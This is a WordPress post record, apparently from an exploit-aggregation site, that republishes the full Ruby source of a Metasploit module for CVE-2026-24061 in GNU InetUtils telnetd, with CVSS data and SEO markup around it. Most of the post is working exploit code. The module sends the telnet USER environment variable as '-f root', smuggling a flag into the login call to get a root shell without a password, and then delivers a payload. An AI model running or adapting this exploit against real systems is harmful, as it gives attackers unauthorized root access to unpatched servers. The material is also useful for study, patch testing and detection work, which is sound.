{"id":40665,"date":"2026-02-12T13:43:42","date_gmt":"2026-02-12T13:43:42","guid":{"rendered":"http:\/\/localhost\/?p=40665"},"modified":"2026-02-12T13:43:42","modified_gmt":"2026-02-12T13:43:42","slug":"gnu-inetutils-telnet-authentication-bypass-exploit-cve-2026-24061","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=40665","title":{"rendered":"GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061_MSF:EXPLOIT-LINUX-TELNET-GNU_INETUTILS_AUTH_BYPASS-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-12T19:28:02&#8243;,&#8221;description&#8221;:&#8221;The telnetd service from GNU InetUtils is vulnerable to authentication-bypass, tracked as CVE-2026-24061, in versions up to version 2.7. During Telnet authentication the SB byte can be sent to indicate sub-negotiation which allows for the exchange of&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-12T18:59:47&#8243;,&#8221;modified&#8221;:&#8221;2026-02-12T18:59:47&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061&#8243;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-LINUX-TELNET-GNU_INETUTILS_AUTH_BYPASS-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-24061&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n\\n  Rank = GreatRanking\\n\\n  include Msf::Exploit::Remote::Telnet\\n  include Msf::Exploit::Capture\\n\\n  NEW_ENVIRON_IS = \\&#8221;\\\\x00\\&#8221;\\n  NEW_ENVIRON_SEND = \\&#8221;\\\\x01\\&#8221;\\n  NEW_ENVIRON_VAR = \\&#8221;\\\\x00\\&#8221;\\n  NEW_ENVIRON_VALUE = \\&#8221;\\\\x01\\&#8221;\\n  SPACE = \\&#8221;\\\\x20\\&#8221;\\n  ZERO = \\&#8221;\\\\x00\\&#8221;\\n  FF = \\&#8221;\\\\xff\\&#8221;\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          The telnetd service from GNU InetUtils is vulnerable to authentication-bypass, tracked as CVE-2026-24061, in\\n          versions up to version 2.7. During Telnet authentication the SB byte can be sent to indicate sub-negotiation which\\n          allows for the exchange of sub-option parameters after both parties have agreed to enable a specific functional option.\\n          Environment variables can be sent as sub-options and it&#8217;s the USER environment variable which introduces the\\n          authentication bypass in this scenario. When the USER environment variable gets sent to the GNU inetutils telnetd\\n          service during authentication, the variable gets appended without proper sanitization to an execv call to the\\n          \/usr\/bin\/login binary. The login binary has a -f flag which skips authentication for a specific user. So the exploit\\n          sets the `USER` environment variable to -f root and the telnetd service responds with a root shell.\\n        },\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;jheysel-r7&#8217;, # Metasploit module\\n          &#8216;Kyu Neushwaistein&#8217; # aka Carlos Cortes Alvarez, discovery\\n        ],\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;CVE&#8217;, &#8216;2026-24061&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/DeadlyHollows\/CVE-2026-24061-setup&#8217;], # Target setup\\n          [&#8216;URL&#8217;, &#8216;https:\/\/www.safebreach.com\/blog\/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061\/&#8217;],\\n          [&#8216;ATT\\u0026CK&#8217;, Mitre::Attack::Technique::T1021_REMOTE_SERVICES]\\n        ],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2026-01-26&#8217;, # Python PoC (TCP)\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Platform&#8217; =\\u003e %w[unix linux],\\n        &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n        &#8216;Privileged&#8217; =\\u003e true,\\n        &#8216;Targets&#8217; =\\u003e [\\n          [ &#8216;Automatic&#8217;, {} ]\\n        ],\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Reliability&#8217; =\\u003e [UNRELIABLE_SESSION], # Should always return a session on the first run but after that a session is not guaranteed &#8211; this behaviour is specific to version 1.9.4 of InetUtils running on Ubuntu 18.04\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;SideEffects&#8217; =\\u003e []\\n        }\\n      )\\n    )\\n\\n    register_options([\\n      Opt::RPORT(23),\\n      OptString.new(&#8216;USERNAME&#8217;, [true, &#8216;Username on device to bypass authentication as&#8217;, &#8216;root&#8217;]),\\n      OptString.new(&#8216;TERMINAL_TYPE&#8217;, [true, &#8216;Terminal type to set when authenticating&#8217;, &#8216;XTERM-256COLOR&#8217;]),\\n      OptInt.new(&#8216;TERMINAL_SPEED&#8217;, [true, &#8216;Terminal speed to set when authenticating&#8217;, 38400])\\n    ])\\n  end\\n\\n  def recv_telnet(fd, timeout)\\n    data = &#8221;\\n    bytes_to_send = &#8221;\\n\\n    begin\\n      data = fd.get_once(-1, timeout)\\n      return nil if data.blank?\\n\\n      data_string = telnet_bytes_to_names(data)\\n      vprint_status(&#8216;Incoming Bytes: &#8216; + data_string)\\n\\n      if @client_sends == 0\\n        bytes_to_send =\\n          IAC + WILL + OPT_AUTHENTICATION +\\n          IAC + DO + OPT_SGA +\\n          IAC + WILL + OPT_TTYPE +\\n          IAC + WILL + OPT_NAWS +\\n          IAC + WILL + OPT_TSPEED +\\n          IAC + WILL + OPT_LFLOW +\\n          IAC + WILL + OPT_LINEMODE +\\n          IAC + WILL + OPT_NEW_ENVIRON +\\n          IAC + DO + OPT_STATUS\\n      elsif @client_sends == 1\\n        bytes_to_send =\\n          IAC + DO + OPT_AUTHENTICATION +\\n          IAC + DONT + OPT_ENCRYPT +\\n          IAC + WONT + OPT_XDISPLOC +\\n          IAC + WONT + OPT_OLD_ENVIRON\\n      elsif @client_sends == 2\\n\\n        # For more info on Telnet Linemode Option please reference: https:\/\/www.rfc-editor.org\/rfc\/rfc1184.html\\n        # The following binary blob was copied from a wireshark dump of a working PoC which used the telnet binary\\n        linemode_slc =\\n          \\&#8221;\\\\x03\\\\x01\\\\x03\\\\x00\\\\x03\\\\x62\\\\x03\\\\x04\\\\x02\\\\x0f\\\\x05\\\\x02\\\\x14\\\\x07\\\\x62\\&#8221; \\\\\\n          \\&#8221;\\\\x1c\\\\x08\\\\x02\\\\x04\\\\x09\\\\x42\\\\x1a\\\\x0a\\\\x02\\\\x7f\\\\x0b\\\\x02\\\\x15\\\\x0c\\&#8221; \\\\\\n          \\&#8221;\\\\x02\\\\x17\\\\x0d\\\\x02\\\\x12\\\\x0e\\\\x02\\\\x16\\\\x0f\\\\x02\\\\x11\\\\x10\\\\x02\\&#8221; \\\\\\n          \\&#8221;\\\\x13\\\\x11\\\\x00\\&#8221; + FF + FF + \\&#8221;\\\\x12\\\\x00\\&#8221; + FF + FF\\n\\n        bytes_to_send =\\n          IAC + SB + OPT_AUTHENTICATION +\\n          ZERO + ZERO + ZERO +\\n          IAC + SE +\\n          IAC + SB + OPT_NAWS +\\n          \\&#8221;\\\\x00\\\\x7e\\&#8221; + \\&#8221;\\\\x00\\\\x3d\\&#8221; +\\n          IAC + SE +\\n          IAC + SB + OPT_LINEMODE +\\n          linemode_slc +\\n          IAC + SE +\\n          IAC + DO + OPT_SGA +\\n          IAC + SB + OPT_LINEMODE +\\n          \\&#8221;\\\\x01\\\\x14\\&#8221; +\\n          IAC + SE\\n        IAC + SE\\n      elsif @client_sends == 3\\n        print_status(&#8216;Sending authentication bypass&#8230;&#8217;)\\n        bytes_to_send =\\n          IAC + SB + OPT_TSPEED +\\n          NEW_ENVIRON_IS +\\n          \\&#8221;#{datastore[&#8216;TERMINAL_SPEED&#8217;]},#{datastore[&#8216;TERMINAL_SPEED&#8217;]}\\&#8221; +\\n          IAC + SE +\\n          IAC + SB + OPT_NEW_ENVIRON +\\n          NEW_ENVIRON_IS +\\n          NEW_ENVIRON_VAR + &#8216;USER&#8217; +\\n          NEW_ENVIRON_SEND + &#8216;-f&#8217; + SPACE + datastore[&#8216;USERNAME&#8217;] + # this is the auth bypass, sending &#8216;-f root&#8217; as the NEW_ENVIRON_VAR \\&#8221;USER\\&#8221;\\n          IAC + SE +\\n          IAC + SB + OPT_TTYPE +\\n          NEW_ENVIRON_IS +\\n          datastore[&#8216;TERMINAL_TYPE&#8217;] +\\n          IAC + SE\\n      elsif @client_sends == 4\\n        bytes_to_send = IAC + WONT + OPT_ECHO\\n      elsif @client_sends == 5\\n        bytes_to_send = IAC + DO + OPT_ECHO +\\n                        IAC + WILL + OPT_BINARY +\\n                        IAC + WONT + OPT_LINEMODE\\n      elsif @client_sends == 6\\n        print_status(&#8216;Sending payload&#8230;&#8217;)\\n        bytes_to_send = payload.encoded + \\&#8221;\\\\x0d\\\\x0a\\&#8221;\\n      end\\n\\n      if datastore[&#8216;VERBOSE&#8217;]\\n        if @client_sends == 6\\n          vprint_status(&#8216;Outgoing Bytes:   &#8216; + bytes_to_send)\\n        else\\n          vprint_status(&#8216;Outgoing Bytes:   &#8216; + telnet_bytes_to_names(bytes_to_send))\\n        end\\n      end\\n\\n      fd.write(bytes_to_send) unless bytes_to_send.empty?\\n\\n      @trace \\u003c\\u003c data\\n      @recvd \\u003c\\u003c data\\n      fd.flush\\n      @client_sends += 1\\n    rescue ::EOFError, ::Errno::EPIPE =\\u003e e\\n      fail_with(Failure::UnexpectedReply, \\&#8221;Sending data failed with error: #{e}\\&#8221;)\\n    end\\n\\n    data\\n  end\\n\\n  def exploit\\n    @client_sends = 0\\n    print_status(&#8216;Connecting to telnet service&#8230; &#8216;)\\n    connect\\n  rescue ::Rex::ConnectionError =\\u003e e\\n    print_error(\\&#8221;Connection failed: #{e.message}\\&#8221;)\\n  ensure\\n    disconnect\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/telnet\/gnu_inetutils_auth_bypass.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/telnet\/gnu_inetutils_auth_bypass\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-12T19:28:02&#8243;,&#8221;description&#8221;:&#8221;The telnetd service from GNU InetUtils is vulnerable to authentication-bypass, tracked as CVE-2026-24061, in versions up to version 2.7. During Telnet authentication the SB byte&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-40665","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061_MSF:EXPLOIT-LINUX-TELNET-GNU_INETUTILS_AUTH_BYPASS- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=40665\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061_MSF:EXPLOIT-LINUX-TELNET-GNU_INETUTILS_AUTH_BYPASS- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-12T19:28:02&#8243;,&#8221;description&#8221;:&#8221;The telnetd service from GNU InetUtils is vulnerable to authentication-bypass, tracked as CVE-2026-24061, in versions up to version 2.7. During Telnet authentication the SB byte...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=40665\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-12T13:43:42+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40665#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40665\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061_MSF:EXPLOIT-LINUX-TELNET-GNU_INETUTILS_AUTH_BYPASS-\",\"datePublished\":\"2026-02-12T13:43:42+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40665\"},\"wordCount\":1212,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40665#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40665\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40665\",\"name\":\"GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061_MSF:EXPLOIT-LINUX-TELNET-GNU_INETUTILS_AUTH_BYPASS- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-12T13:43:42+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40665#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40665\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40665#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061_MSF:EXPLOIT-LINUX-TELNET-GNU_INETUTILS_AUTH_BYPASS-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061_MSF:EXPLOIT-LINUX-TELNET-GNU_INETUTILS_AUTH_BYPASS- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=40665","og_locale":"en_US","og_type":"article","og_title":"GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061_MSF:EXPLOIT-LINUX-TELNET-GNU_INETUTILS_AUTH_BYPASS- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-12T19:28:02&#8243;,&#8221;description&#8221;:&#8221;The telnetd service from GNU InetUtils is vulnerable to authentication-bypass, tracked as CVE-2026-24061, in versions up to version 2.7. During Telnet authentication the SB byte...","og_url":"https:\/\/zero.redgem.net\/?p=40665","og_site_name":"zero redgem","article_published_time":"2026-02-12T13:43:42+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=40665#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=40665"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061_MSF:EXPLOIT-LINUX-TELNET-GNU_INETUTILS_AUTH_BYPASS-","datePublished":"2026-02-12T13:43:42+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=40665"},"wordCount":1212,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=40665#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=40665","url":"https:\/\/zero.redgem.net\/?p=40665","name":"GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061_MSF:EXPLOIT-LINUX-TELNET-GNU_INETUTILS_AUTH_BYPASS- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-12T13:43:42+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=40665#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=40665"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=40665#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061_MSF:EXPLOIT-LINUX-TELNET-GNU_INETUTILS_AUTH_BYPASS-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40665","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=40665"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40665\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=40665"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=40665"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=40665"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}